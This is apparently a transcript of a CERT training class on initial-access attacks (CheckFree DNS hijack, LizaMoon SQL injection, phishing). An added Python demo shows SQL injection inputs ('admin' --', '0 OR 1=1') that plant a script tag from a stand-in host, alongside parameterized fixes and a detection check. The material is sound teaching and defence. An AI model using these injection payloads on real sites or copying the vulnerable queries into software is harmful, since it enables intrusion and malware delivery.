
Foothold Attacks

Table of Contents

Threat Primer .................................................................................................................................. 2

Cyber Threats .................................................................................................................................. 3

Cyber Threat Categorization ........................................................................................................... 6

Foothold .......................................................................................................................................... 7

Foothold Attacks ............................................................................................................................. 9

Foothold Attacks – Example ......................................................................................................... 11

Foothold Attacks – SQL Injection .................................................................................................. 13

Foothold Attacks – Phishing.......................................................................................................... 16

Foothold Attacks – Mitigating Strategies ..................................................................................... 17

Notices .......................................................................................................................................... 19

Page 1 of 19

Threat Primer

© 2012 Carnegie Mellon University


**001 So, the first thing that we're going to talk about is the various threats, the cyber threats that are out there.


Cyber Threats

Open question – What cyber threats concern you?
• Disruption of critical web services
• Web site defacement and resultant reputation hit
• Loss of customers’ private information
• Nation-state espionage
• Hackers using your services to attack others
• Spear-phishing against employees
• Attacker mapping your internal network
• Rootkits and other persistent malware

**002 An open question to you-- and again, this is the interactive portion of the class. What keeps you up at night? What type of cyber concerns do you have? What worries you, either from a personal perspective, organizational perspective, or state of the cyber world in general? What concerns you? There are some suggestions up on the screen that you're more than welcome to tell me are your concerns, or you can come up with some others. Yes, ma'am?

Student: Personally, just in daily use, that somebody doesn't get you by you clicking on something, or-- I'm always sort of aware of where I'm going and what I'm clicking on.

Chris Evans: Okay, safe computer habits.

Student: Right.

Chris Evans: All right. Sir?

Student: What concerns me is more if my network is down for this amount of time we lose this amount of profit. So, it's more of a-- everything's about-- well, for the most part, about money. And that's why people are in business. And if people are down, then also the productivity of my employees will also not be able to-- productivity will go down. So, I'm mainly concerned about the downtime because we're protecting our data. Our data is safe. It's offline. However, the possibility that someone can steal the information does worry me a little bit, but the thing that worries me most is productivity going down and loss of money.

Chris Evans: Yep. Okay. So, denial of service, or maybe how your organization reacts to a cyber attack that has larger-reaching effects. Okay.

Student: Users.

Chris Evans: Users? What concerns you about users?

Student: They're the biggest weakness in the system administration jobs. And all of that stuff can happen, but to me the biggest concern that I have, from my perspective, is making sure that the users aren't enabling the bad guy to get in.

Chris Evans: That's an excellent point. The users are the weakest link in just about any network infrastructure: not the firewall, not the IDS, not the fact that they're missing patches, but the person sitting behind the keyboard. What else? Anything? Nobody mentioned data loss. What about corporate espionage, somebody stealing your intellectual property? That might be a concern to you. Just understand that there's a huge cyber threat realm out there. There's a lot of bad stuff that can go on. And how you react to that should be based on, really, what concerns you the most. Understand that this amount of stuff can go wrong. Do you need to be able to detect, monitor, and respond to all of this stuff? No. What you need to be able to respond to, detect, analyze, and that sort of thing are the things that really concern you. So, on this list, you might find that there are two or three things you're really concerned about. And the other things, you're like, I'm concerned about that but not as concerned about it. So, what we actually advocate through this class is that you take a risk-based approach to detection, analysis, and response. Understand that you can't solve all the world's cyber problems. Pick the ones that are most relevant to you, that have the most impact on you, and concentrate on those. And the rest of it, given limited resources, you may not be able to do anything about.


Cyber Threat Categorization


Foothold

Reconnaissance and Enumeration

Privilege Escalation

Corruption

Disruption

Data Exfiltration

Persistence

Malicious Use

[Figure: the eight categories laid out as a path from Foothold through Recon & Enum, Priv Esc., Corruption, Persistence, Data Exfiltration and Disruption to Malicious Use, plotted against a horizontal "Time and Effort" axis and a vertical "Concurrency" axis. Caption: Some Attacks May Involve Multiple Categories.]

**003 We've kind of gone through and made a notional categorization of the various cyber threats that are out there. This is kind of what we see as the various categories, from foothold all the way down to malicious use. You might find that some attacks pull from multiple categories here. So, it's not just an initial access attack or a foothold attack. Maybe it's a combination of foothold and privilege escalation, or foothold, privilege escalation, and denial of service. So, don't look at this and go, each cyber attack or cyber threat has to fit in one of these buckets. It may fit in multiple buckets. What I will tell you here, if you look at time and effort and concurrency, meaning what attacks could go on at the same time, you usually see some type of path evolve here. So, attackers will start with a foothold attack. Then they'll do some type of reconnaissance and enumeration. Then they might do privilege escalation. They might finish with a persistence attack. Or, they might just do a denial of service, a disruption attack. Or, they might just come in and do data exfiltration. Understand that any of these attacks could go on at any time, and they might be going on in parallel with each other, too.

Foothold


Initial attempts to access and establish a remote connection into the network

• Direct
  — SQL Injection, Operating System exploits
• Indirect
  — Phishing email with malware attachments
  — Website hosted malware installations

Motivations
• Gain access for future attacks

This is usually an “enabling” attack.

**004 So, let's start with a foothold attack. If I said, what is a foothold attack? Well, it's an initial attempt to gain access to the network. What do you think are some initial access attacks? What are some foothold attacks?

Student: Spear phishing.

Chris Evans: Spear phishing, that's one. What else would an attacker do to get into a network?

Student: Leave a USB drive behind.

Chris Evans: Putting malware on a USB stick and hopefully having somebody open it.

Student: Man in the middle.

Chris Evans: Man-in-the-middle attacks, SQL injection, direct exploits. Basically, the ways that an attacker can get into a system, there are quite a lot of them. So, we looked at this and said there are basically direct attacks, where you're actually targeting a system and attacking a system directly. And then there are indirect attacks, where you're maybe relying on a user, a social engineering attack, or something like that. So, with a direct attack what we're talking about is SQL injection, direct operating system exploits like exploiting a missing patch on a Windows system or something like that. And indirect, these are ones that require user interaction. So, you're not attacking a system per se as a hacker here. What you're going after is the weakest link in the cyber security chain, the user, as the gentleman in the back mentioned earlier. Why would somebody do an attack like this? Well, it's an enabling attack. What they're trying to do is gain access to your network to do other things. Why would a hacker just get into the network and say, I got into the network, I'm done. Would they ever do that?

Student: Yes.

Chris Evans: Maybe. They might, if they're doing it just for fame or to put their name in lights. Hey, I hacked into this system. Sure. But usually hackers have other motivations. And they'll use this as an enabling attack, the first step.

Foothold Attacks


Will target your servers, workstations, and users – anything that is accessible over the network

Checkfree.com

Special thanks to Rod Rasmussen of Internet Identity for contributing source material for this study.

Accessible Email, Web, Remote Administration, etc.

**005 So, here we have an example of a phishing email. It's going to target anything accessible over the network: your email servers, your web servers, your users if they check email or something like that. There was a case a while ago, I think this was from 2008. There was a company called CheckFree.com, and they do a lot of automated clearinghouse, ACH, payment processing. So, if you had a bill payer service, chances are the payments were cleared through this company. And if you had a, let's say, online bill pay service, chances were good that it went through this service as well. Well, somebody at this company received a phishing email. It looked like this. And it was asking them to go and update their name server registrations. The email ostensibly came from Network Solutions, which is a DNS name registration service. And it said, we need you to update your customer information. Please come to networksolutions.com. I know that's a little blurry. You've got to squint to see it. But please come to networksolutions.com. Log in to your control panel and update your name server registrations. Well, where this link actually went was networksolutions.com.com42.asia. How many of you want to bet that Network Solutions actually controlled that server? I wouldn't take that bet if I were you. Network Solutions is a very big company, and they're not going to register something with a name this obscure, four domain names down, three levels down. Probably not.


Foothold Attacks – Example


December 2, 2008, at about 0030 EST, an attacker modified the authoritative nameserver registration for CheckFree.com.

• Used an on-line control panel belonging to Network Solutions (CheckFree.com’s registrar)

• Pointed the registration to Network Solutions’ free nameserver at nsXX.worldnic.com

The attacker updated all the address records for CheckFree.com hosts to a server physically located in Ukraine.

It is believed that CheckFree.com’s Network Solutions control panel credentials were compromised by a phishing attack and used to change the nameserver registrations.

**006 So, what actually happened? The attackers sent this phishing email in. They were able to compromise somebody's credentials for the actual Network Solutions page. And what they did was they went in and they took over the DNS name servers for the company. And instead of going to the company's name servers, they went to a server in the Ukraine. What happens when you change DNS servers? First of all, do you understand what DNS servers do? They direct www.google.com to some IP address. What would you be able to do if you could change what that server said?

Student: Redirect them all to your machines.

Chris Evans: Yep, you'd be able to redirect people, and it would be seamless. So, people would put in checkfree.com, and it would go to the DNS server. And the DNS server would say, I have a server in the Ukraine for you to talk to. That process is completely transparent to all the users that are out there. When you put in checkfree.com or any URL into your web browser, do you see the domain name process going on? Do you see the IP address that comes back? Unless you're really looking at it, no, you don't. So, this was a great attack because it's completely transparent to the end user. So, what happened? They changed the name servers and started redirecting everybody. Instead of going to checkfree.com servers in the U.S., they went to a checkfree.com server in the Ukraine. Kind of the end result of this was the attackers here were not really sophisticated. Or they didn't really follow through on the attack, because what the analysis of this seemed to indicate was they were only pushing malware, or adware, when people visited their site. So, people coming into billpay.checkfree.com ended up on this server in the Ukraine, and they got adware. Well, if you were a cyber crime entity, you might also do something like put a copy of the billpay site up there. I'll ask you for your username and password. I'll ask you for your bank account details, and I'll start stealing money from you. The guys behind this attack didn't do any of that. And I think CheckFree as a company got off easy because of that.


Foothold Attacks – SQL Injection


http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html
http://www.ibtimes.com/articles/129843/20110402/lizamoon-websense-apple-itunes-security-trojan-malware-scareware-script-sql-injection-four-million-w.htm

April, 2011 – LizaMoon – SQL injected sites push “scareware” on visitors

• ~ 1100 sites, 30,000 – 1.5 million hosts infected

Takes advantage of “trust” between a site and its visitors.

**007 Yes sir?

Student: I was going to say I know some people that do what they call domain kiting or floating. Because when you buy a domain you have five days or something. There's a grace period where you can decide whether you want the domain name. And in that period they'll try to put up a fake banking site and put the Verisign down to make it look real secure, just almost identical. And then after they get your information, then that domain name will say I don't want it. So, that also covers up their tracks.

Chris Evans: Yep, that's a huge attack surface. So, the attackers have realized that the end user has kind of gotten a little bit smarter than we were ten years ago. So, ten years ago you could send in an obfuscated URL as part of the phishing email, and everybody would go okay and fall for it. But today people will look at the URL and go, this .com.com42.asia.whatever, that looks a little suspicious. So now what the attackers are doing is they are using more legitimate-looking domain names, as you suggested, like copies of Verisign with a one in it or something like that, instead of the URL obfuscation attacks. SQL injection, this is probably one of the biggest attack vectors that are out there right now. There is a recent data breach report that says roughly eighty-five percent of the data breaches in the world are caused by SQL injection. So, these are people hacking into web servers that have a database back end to them. There was a case about a year ago, LizaMoon. This is where the hackers came in and hacked up a site such that when people visited it, they had malware installed on their systems. Actually, it was scareware. So, if you visited a certain site, and it was a legitimate site. This is not a hacker site or some bogus site. This was a legitimate site that the hackers modified with SQL injection, so that when you came to the site, you actually downloaded a piece of scareware that looked like this. It would pop up a little box on your screen. And it would say your computer is infected. You've got twenty-six Trojans, thirty-nine worms, seventeen viruses. You've got every virus known to man on this computer. You are very insecure. But we can help you with that for the low cost of $29.95. Pay us with your credit card. We'll take care of all these big problems for you. We'll take all the malware off your system, and you'll be happy. And we will be happy. Do you think this works?

Student: Yes.

Chris Evans: It works to the tune of about a billion dollars. The crew behind this was arrested in an Eastern European country maybe a year ago. One billion dollars out of this one scam. Wow. So, how many people did they get to go-- to the pay me $29.95, and I'll clean up your system? Quite a few. It was quite a cyber crime ring they had going. The guys behind this were actually caught because they were driving Mercedes S-Class sedans around this really tiny Eastern European city where the average income is significantly lower than what could afford a Mercedes S-Class. So, they were living a little bit beyond what the local economy would support, and that raised some flags. But after clearing a billion dollars, they were doing pretty good for themselves.
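The slide and the narration say only that LizaMoon-style attacks used SQL injection to turn legitimate sites into scareware distributors. The following Python is an added example by the editor, not code from the course or from any site involved in that incident. Against an in-memory SQLite database it shows both halves of that foothold: a string-built login query that a quote and a comment marker bypass, and a string-built UPDATE whose injected WHERE clause appends a script tag to every page of the site, each beside the parameterized version that stops it. The schema, rows, endpoint names and the script URL (lizamoon-style.example) are all constructed.

```python
"""SQL injection as a foothold: string-built queries beside parameterized ones.

Added example for this section, not code from the SEI course or from any
affected site.  Schema, rows, endpoint names and the script URL are constructed.
"""
import sqlite3

# Constructed stand-in for the injected tag; the real campaign pointed at
# attacker-controlled hosts, this domain is reserved for documentation.
PAYLOAD_SCRIPT = '<script src="http://lizamoon-style.example/ur.php"></script>'


def setup() -> sqlite3.Connection:
    """Build a tiny CMS database: three pages and one admin user (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, pw_hash TEXT);
        INSERT INTO users VALUES ('admin', 'hash-of-secret');
        CREATE TABLE pages (id INTEGER PRIMARY KEY, slug TEXT, body TEXT);
        INSERT INTO pages (slug, body) VALUES ('home', '<h1>Welcome</h1>'),
                                             ('about', '<p>About us</p>'),
                                             ('contact', '<p>Call us</p>');
        """
    )
    return conn


# --- read side: authentication bypass -----------------------------------------

def login_vulnerable(conn, username: str, pw_hash: str) -> bool:
    """Concatenates input into SQL.  username = "admin' --" closes the string
    and comments out the password check, so the admin row matches."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}' AND pw_hash = '{pw_hash}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, pw_hash: str) -> bool:
    """Bound parameters travel separately from the SQL text, so a quote or a
    comment marker in the input is just data to compare against."""
    sql = "SELECT 1 FROM users WHERE username = ? AND pw_hash = ?"
    return conn.execute(sql, (username, pw_hash)).fetchone() is not None


# --- write side: the LizaMoon pattern -----------------------------------------

def append_note_vulnerable(conn, page_id: str, note: str) -> int:
    """'Append a footer note to page N', trusting page_id from the request.
    page_id = '0 OR 1=1' widens WHERE to every row, so the attacker's script
    tag lands on every page the site serves.  Returns rows changed."""
    sql = f"UPDATE pages SET body = body || '{note}' WHERE id = {page_id}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def append_note_safe(conn, page_id: str, note: str) -> int:
    """Type-check the id and bind both values; '0 OR 1=1' never reaches SQL."""
    pid = int(page_id)  # raises ValueError for anything but an integer
    cur = conn.execute("UPDATE pages SET body = body || ? WHERE id = ?", (note, pid))
    conn.commit()
    return cur.rowcount


def pages_with_script(conn) -> list:
    """Defender's check: slugs of pages whose stored body now carries a script tag."""
    rows = conn.execute("SELECT slug FROM pages WHERE body LIKE '%<script%' ORDER BY id")
    return [r[0] for r in rows]


def demo() -> dict:
    """Run both attacks against both versions on a fresh database."""
    conn = setup()
    results = {
        "bypass_vulnerable": login_vulnerable(conn, "admin' --", "wrong"),
        "bypass_safe": login_safe(conn, "admin' --", "wrong"),
        "tampered_rows": append_note_vulnerable(conn, "0 OR 1=1", PAYLOAD_SCRIPT),
    }
    results["infected_pages"] = pages_with_script(conn)
    try:
        append_note_safe(conn, "0 OR 1=1", PAYLOAD_SCRIPT)
        results["safe_rejected"] = False
    except ValueError:
        results["safe_rejected"] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the write-side injection never returns data to the attacker; the site's own visitors are the payload delivery channel, which is the "trust between a site and its visitors" the slide refers to. A scheduled query like `pages_with_script` against stored content is the cheapest way for a site owner to notice that it has happened.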


Foothold Attacks – Phishing


fraudwatchinternational.com

http://news.softpedia.com/news/PDF-Based-Targeted-Attack-Against-Military-Contractors-Spotted-212139.shtml

July 2011

**008 Another type of foothold attack, phishing attacks, these are very prevalent. They're getting very, very good. Here you can see this email that ostensibly came from Bank of America. It has the Bank of America logo on it. It has the little copyright statement on it. It has the same fonts and style sheets that Bank of America uses. It looks pretty legitimate. When you click on the link, you pull up this website here. And this website, again, it's got the Bank of America logo. It looks just like the Bank of America site, but it's asking you a lot of really detailed questions: can I have your bank account number? Can I have your mother's maiden name? Can I have your address? But it looks very, very realistic. There's a site out there called Fraud Watch International, fraudwatchinternational.com. They track all this sort of monkey business that's going on with phishing. And so, you can see, look at how many phishing attacks they're actually monitoring. They've got thousands in there. They probably have between twenty and thirty that get added every day of people trying phishing attacks that look like this.

Foothold Attacks – Mitigating Strategies


Awareness and Education
• Phishing Exercises

Intrusion Detection Systems

Critical Application Code Reviews

Externally Visible System and Application Patching

Access Control
• White listing

Conduct Regular Vulnerability Scans
• Finds common holes which an attacker can exploit

**009 Mitigating strategies: if you are trying to get around foothold attacks, what would you actually do? Well, user education is key, so making sure that users don't fall victim to this sort of stuff. Intrusion detection systems will pick up the stuff that there's a signature for, at least. You might try to do some application code reviews to get around or find the SQL injection points before the attackers can get to them. Any external system needs to be patched, and it's got to be kept up to date. I know that's kind of-- patching is almost a losing game because all you're doing is reacting to the potential attacks that could be there. Somebody can always come along with a zero day or something like that and catch you. But you have to do it. Application white listing or access control will make sure that users can't download and run junk.exe or something like that. And regular vulnerability scans. These will tell you where the holes are in your network. The theory is that you can go and fix those before the bad guys come along and do it.


Notices

Copyright 2013 Carnegie Mellon University

This material has been approved for public release and unlimited distribution except as restricted below. This material is distributed by the Software Engineering Institute (SEI) only to course attendees for their own individual study. Except for the U.S. government purposes described below, this material SHALL NOT be reproduced or used in any other manner without requesting formal permission from the Software Engineering Institute at [email protected].

This material is based upon work funded and supported by the Department of Defense under Contract No. FA8721-05-C-0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded research and development center.

The U.S. Government's rights to use, modify, reproduce, release, perform, display, or disclose this material are restricted by the Rights in Technical Data-Noncommercial Items clauses (DFAR 252-227.7013 and DFAR 252-227.7013 Alternate I) contained in the above identified contract. Any reproduction of this material or portions thereof marked with this legend must also reproduce the disclaimers contained on this slide.

Although the rights granted by contract do not require course attendance to use this material for U.S. Government purposes, the SEI recommends attendance to ensure proper understanding.

NO WARRANTY. THE MATERIAL IS PROVIDED ON AN “AS IS” BASIS, AND CARNEGIE MELLON DISCLAIMS ANY AND ALL WARRANTIES, IMPLIED OR OTHERWISE (INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR A PARTICULAR PURPOSE, RESULTS OBTAINED FROM USE OF THE MATERIAL, MERCHANTABILITY, AND/OR NON-INFRINGEMENT).

CERT® is a registered mark of Carnegie Mellon University.
